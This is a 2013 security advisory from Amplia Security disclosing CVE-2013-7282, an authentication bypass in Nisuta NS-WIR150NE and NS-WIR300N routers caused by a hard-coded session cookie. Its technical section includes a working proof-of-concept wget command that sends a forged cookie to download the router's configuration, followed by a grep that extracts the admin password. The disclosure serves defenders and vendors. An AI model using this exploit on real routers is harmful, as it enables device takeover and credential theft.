Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers Remote Management Web Interface Authentication Bypass Vulnerability
Security Advisory Title: Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers Remote Management Web Interface Authentication Bypass Vulnerability Advisory ID: AMPLIA-ARA050913 Date published: 12-26-2013 Vendors contacted: Nisuta (www.nisuta.com) Release mode: Coordinated release Last Updated: 04-21-2014
Index
1. Vulnerablity information
2. Vulnerablity description
3. Vulnerable systems
4. Vendor Information, solutions and workarounds
5. Credits
6. Technical description
7. Disclaimer
1. Vulnerability information
Impact: Remote attackers can bypass authentication and access the router's management web interface obtaining complete control of the device
Remotely Exploitable: Yes
Bugtraq Id: <unknown>
CVE: CVE-2013-7282
2. Vulnerability description
The Nisuta (www.nisuta.com) NS-WIR150NE and NS-WIR300N wireless routers provide a remote management web interface available both on the WAN (not enabled by default) and LAN interfaces (enabled by default).
This remote management web interface requires a password.
A remote attacker can bypass authentication and gain access to the remote management web interface, taking control of the device, without knowing the password.
3. Vulnerable Systems
Nisuta NS-WIR150NE wireless router, firmware v5.07.41
Nisuta NS-WIR300N wireless router, firmware v5.07.36_NIS01 (hardware version v3.0)
and probably other Nisuta wireless routers with similar firmware.
4. Vendor Information, Solutions and Workarounds
The vendor made available the following firmware updates:
Nisuta NS-WIR150NE
https://www.nisuta.com/producto.asp?id=NSWIR150NE
https://www.nisuta.com/drivers/NSWIR150NE.rar
Nisuta NS-WIR150NF
https://www.nisuta.com/producto.asp?id=NSWIR150NF
https://www.nisuta.com/drivers/NSWIR150NF.rar
Nisuta NS-WIR300N
https://www.nisuta.com/firmware/NSWIR300N.rar
Nisuta NS-WIR300ND
https://www.nisuta.com/firmware/NSWIR300ND.rar
The fix implemented by the vendor is not optimal, although better than any workaround.
As a workaround, disable remote management on the WAN interface (not enabled by default). However, it is not possible to disable remote management on the LAN interface, and applying the fix is recommended.
It is possible to restrict remote management on the WAN interface based on source IP address, but given the critical nature of this vulnerability we do not recommend it as a workaround.
It is also worth mentioning that the remote management web interface works over http without encryption, even with the flaw described in this advisory fixed, the interface is still insecure for other reasons.
5. Credits
This vulnerability was discovered by Amplia Security Research.
We thank Nisuta for their efforts to try to fix this vulnerability and improve the security of their products.
6. Technical description
The Nisuta NS-WIR150NE and NS-WIR300N wireless routers provide a remote management web interface available both on the WAN (not enabled by default) and LAN interfaces (enabled by default).
This remote management web interface requires a password and uses form-based authentication (performed over http without encryption, which is another issue).
After entering the correct password, the router's remote management web interface always sets the same cookie, shown next:
Set-Cookie: admin:language=en; path=/
This cookie is hard-coded and obviously insecure.
Using this cookie in a HTTP request is enough to "bypass authentication" and login to the remote management web interface as an administrator without knowing the password.
The 'admin' value is not even required. For example,
Cookie: :language=en; path=/
is enough to gain access to the router.
PoC Exploit:
An unauthenticated remote attacker on the WAN and LAN interfaces can perform any action available on the router's remote management web interface, as an example, the following command will bypass authentication and download the router's configuration which includes the current remote management web interface password among other confidential information:
$ wget --header="Cookie: :language=en" http://192.168.2.1/cgi-bin/DownloadCfg/config.cfg -t 1
The password is in the 'http_passwd' variable:
$ grep http_passwd config.cfg
http_passwd=mysecretpassword
$
The attacker can now conveniently login into the remote management web interface with full control and perform changes, obtain information, etc.
Again, the password is not needed, the attacker can just set the cookie 'admin:language=en' in his browser to gain access to the management interface or perform other actions directly, this is just an example.
Custom implementation of the PoC exploit:
7. Disclaimer
The contents of this advisory are copyright (c) 2013 Amplia Security (www.ampliasecurity.com), and may be distributed freely provided that no fee is charged for distribution and proper credit is given.